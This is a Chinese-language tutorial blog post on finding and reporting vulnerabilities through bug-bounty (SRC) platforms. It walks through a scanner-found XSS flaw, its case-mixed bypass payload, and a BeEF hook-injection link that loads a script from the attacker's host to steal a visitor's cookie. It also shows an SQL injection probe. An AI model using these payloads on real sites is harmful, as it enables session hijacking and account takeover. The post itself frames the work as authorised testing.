初识SRC漏洞平台提交漏洞
//由于初学时使用工具较多,不建议对目标进行大批量扫描,手测为主,工具为辅,下文仅作示例,明白大体流程即可,实操为真。
1.1 漏洞平台
补天漏洞响应平台:https://www.butian.net/
漏洞银行:https://www.bugbank.cn/
阿里云漏洞响应平台:https://security.alibaba.com/
i春秋SRC部落:https://www.ichunqiu.com/src
腾讯应急响应中心:https://security.tencent.com/index.php
网易、百度等等。
1.2 网站情况
常见漏洞类型:
XSS、SQL注入、CSRF、权限绕过、文件上传、弱口令、代码执行等等。
发现漏洞方法:
1. 手工寻找(XSS,SQL注入,CSRF等等)。
难度系数:⭐⭐⭐⭐ 牛逼指数:⭐⭐⭐⭐⭐
一般漏洞平台上除了刚出的服务厂商,其他大多数很明显的漏洞都被提交过了,手工找有些难度,有些网站在对非法字符的过滤也很到位,在url尝试是否存在sql注入,如 and 1=2 ,网站防护机制对用户一旦出现此类非法字符串,便对访问者ip进行连接重置,一段时间后才能访问。
2. 工具扫描/辅助(AWVS、Nessus、sqlmap等等)
难度系数:⭐⭐ 牛逼指数:⭐⭐⭐
在漏洞平台上的厂商,同样大部分明显直接的漏洞比较少,再加上有的有防火墙和web服务器配置,很多网站只要’察觉’到一个ip的非正常访问(比如扫描网站),就直接采用连接重置,或者无法访问,对扫描ip墙在外面。所以扫描工具的使用,也有一定条件。
3. 手工寻找+工具扫描/辅助
难度系数:⭐⭐⭐ 牛逼指数:⭐⭐⭐⭐ 实用指数:⭐⭐⭐⭐⭐
通过工具的辅助,找到漏洞点再结合自身知识利用漏洞,往往事半功倍,很有效果
防护情况案例一:(可能会涉及到什么所以对厂商均打码)
厂商:
子网站教务系统,页面通过单独窗口实现信息显示,url无法测试。
防护情况案例二:
厂商
找到asp脚本编写同时有id传参的页面
尝试注入语句
/video_list.aspx?s_classid=221 and 1=2
回车
防火墙拦截。
防护情况案例三:
厂商:大部分厂商
即扫描工具扫描,服务器防御灵敏的直接墙掉ip,放宽点的当你扫描一定时候到达一定的时候,重置连接。
1.3 发现/提交漏洞
厂商
网址:
发现步骤
1. 手工寻找
网页的大部分新闻内容全为静态的内容,无下手之地。
直到
进入后是该网站的一个子网站,熟悉的php,寻找漏洞点
注册:
在手工找不到可能存在的漏洞点,尝试工具扫描
//2021年注:由于19年刚接触使用工具较多,现阶段原则上是不允许批量漏扫工具对网站进行扫描,多以手工加漏洞验证为主。
//以下示例仅熟悉流程即可,勿学博主用工具直接扫!!!!!!。勿学博主用工具直接扫!!!!!!
//手工测试可对url进行burp的xss语句检测即可。
使用工具(AWVS)进行站点扫描
幸运的是,该站点对扫描没有进行设置防御,
扫到该站点的目录
其中Forbidden是权限不够无法访问,但是文件存在。
接下来,很明显的看到了极有可能是后台admin目录
不幸的是,能访问,文件也存在,无回显内容
一片空白,继续换下一个思路
查看是否存在漏洞。
其中显目的第一个 Cross Site Scripting (XSS)
寻找到这三个漏洞点
进入直接弹出对话框
接下来看是什么地方存在漏洞点:
渗透测试XSS语句
'%22()%26%25<acx><ScRiPt%20>prompt(931058)</ScRiPt>&system=ask&url=e
经过简化
%22 是url编码后的,原数据为 ” ,一个双引号,用于对html元素属性进行结束
效果等同于:"><ScRiPt >alert(123)</ScRiPt>
这里<acx><ScRiPt%20>prompt(931058)</ScRiPt> script采用了大小写重复,常用的绕过方法。其中prompt(931058) 是js中与用户交互的提示框,标题就为931058.
其中prompt(931058)是工具的测试语句,换成熟悉的alert(‘XSS’) 便明显很多。
这也能说明当右键编辑http请求的时候会弹出对话框。
知道漏洞点漏洞原理后,找到漏洞点:
/index.php/core/uploader-image_cut?module=item&system=ask&url=e
其中/index.php/core为上文的注册页面,手工注册是打不开的,这也说明了工具利用的重要性。
利用测试语句测试漏洞的存在
漏洞是存在的,单单的弹窗无法提现出此漏洞的作用,
接下来利用XSS漏洞
利用工具:beef (kali下的xss平台)
利用步骤:
1. beef工具平台开启
Kali ip:192.168.88.149
2. 制造XSS利用链接:
’"()<acx><script src="http://192.168.88.149:3000/hook.js"> </script>
3. 访问者访问
Win10
回车后,直观上网页无反应
4. 查看beef平台
可以看到ip,操作系统,系统软件的配置
重要的在下面
拿到访问者的访问cookie,可通过改包修改cookie登录访问者用户。
到此结束,没有进一步的渗透(还不会高级的)。
下面为漏洞提交的页面
1.4 思路总结
1. 学会工具和手工结合,会有意外收获。
2. 常规注入点,漏洞点别放过。
3. 发现漏洞,需测试漏洞的存在性(别破坏网站的完整)
4. 漏洞利用,进一步提现漏洞的价值性,在提交的时候需要有漏洞利用过程截图等。
5. 最后提出解决方案,完事。
不做破坏!授权测试!
初识SRC漏洞平台提交漏洞相关推荐
- 补天漏洞平台为什么能吸引众多白帽和企业?
[51CTO.com原创稿件]3月7日,维基解密分批公开了据称是美国中情局与网络攻击相关的一批秘密文件,文件揭露了美国中央情报局黑客部队的黑暗历史:攻击手法.攻击目标.会议记录以及几乎所有的黑客工具均 ...
- src 漏洞平台 应急响应中心 提交漏洞 简介
目录 1 漏洞平台 2 网站情况 3 发现/提交漏洞 4 思路总结 1 漏洞平台 漏洞银行 https://www.bugbank.cn/ 漏洞盒子 https://www.vulbox.com/ i ...
- 【资源帖】漏洞平台(国内外)+企业SRC整理-持续更新
前言 不挖洞的安服工程师不是一个合格的白帽子,整理一波各大SRC平台的名单,欢迎评论补充,共同学习. 更新记录 3月6日 新增企业SRC 字节跳动安全中心 综合SRC平台-国内 漏洞银行 漏洞盒子 ...
- 各大漏洞平台及SRC的区别和如何批量刷漏洞
批量刷漏洞: 01刷指纹->02刷原始漏洞->03刷CMS->04刷指定政府.教育->05刷众测平台->06刷SRC->07刷国内外.活动 搜索引擎: 百度.goo ...
- 黑客提交漏洞先获感谢后被举报 网络安全行业或现标志性事件
在白帽子们看来,这就是一次普通得不能再普通的找漏洞行为:在世纪佳缘公司看来,这是在保护用户数据上做了一个正常的决定.但是当这两者碰到一起,就演变成了白帽子圈子里不亚于一场地震的抓人事件.谁对谁错?现在 ...
- 蚂蚁金服安全应急响应中心上线 用户可提交漏洞
蚂蚁金服安全应急响应中心(AFSRC)已于今日上线.该平台旨在集合安全领域的专家.白帽子.社会团体及个人共同发现潜在的漏洞信息,并依此建立漏洞统计分析中心,预知并自查风险,及时修复漏洞,帮助提升自身产 ...
- 初次使用Pikachu漏洞平台进行测试实验
初次使用Pikachu漏洞平台进行测试实验 初次实验具体操作 第一部分:XSS漏洞 1.pikachu平台上的反射型XSS漏洞(get) 1.pikachu平台上的反射型XSS漏洞(get). 首先测 ...
- pikachu漏洞平台靶场练习 总结 wp
每日学习 每日持续更新ing~ 之前一直都是在CTF刷题,感觉平常还是要打打靶场,学习一下实战环境啊~ 结合靶场视频:https://www.bilibili.com/video/BV1Y7411f7 ...
- 补天漏洞平台:让更多的白帽子脱离黑产
4月9日,记者终于有机会见到了补天平台上贡献排名第一的a0.在360补天平台的颁奖台上,显得有些腼腆,谈获奖感言的时候也有一丝哽咽.但谁曾想,正是这位不太善于言表的年轻人,在补天平台累计提交有效漏洞9 ...
最新文章
- linux 静态编译 glibc,GCC静态链接glibc库
- h3c的gpu安装linux系统,h3c服务器u盘安装linux系统安装
- Selenium-几种操作
- 接口样板_完整的AWS Web样板
- 网络IO模型详细分析
- Centos7快速部署CloudStack服务器
- 326.是否为3的平方根 IsPowerOfThree
- 大数据与python-零起点Python大数据与量化交易 PDF 下载
- win8网速怎么测试软件,Win10怎么测试网速 Win10在线测试网速方法
- 多个excel工作簿合并_EXCEL2016中如何快速合并多个工作簿中内容到一个工作表
- 深入医疗PACS影像融合存储解决方案
- Map集合通过value获取key的几种方式
- typroa 思维导图_巧用Markdown和百度脑图
- PHP程序提示验证码错误的问题(输入了正确的验证码)
- 基于OneDNS实现上网安全防护和监控
- windows - PHP 开发环境搭建
- 调用百度AI接口实现图片文字识别
- 当局者迷旁观者清红警游戏反杀局案例分析
- 今天给大家带来满满的干货:华为的薪资与奖金
- 暑期实践第九天 2022-7-12
热门文章
- C语言案例教学设计论文,C语言教学设计本科教学论文
- 4054原厂LTH7R座充充电管理IC
- itext html to pdf设置边距,itextpdf特定页面上的不同边距
- 2020最新版python基础入门学习视频教程
- Windows和Mac OS的伽马值
- 【保研面经】人大信息学院,北航计算机学院,中科大大数据学院,南大计算机系
- eclipse-svn插件
- 女生适合做软件开发工作吗?优势在哪里?
- 微信小程序简单介绍及例子,小白可看
- 一步控制台编译java_在控制台运行一个 Java 程序 Test . class ,使用的命令正确的是( )_学小易找答案...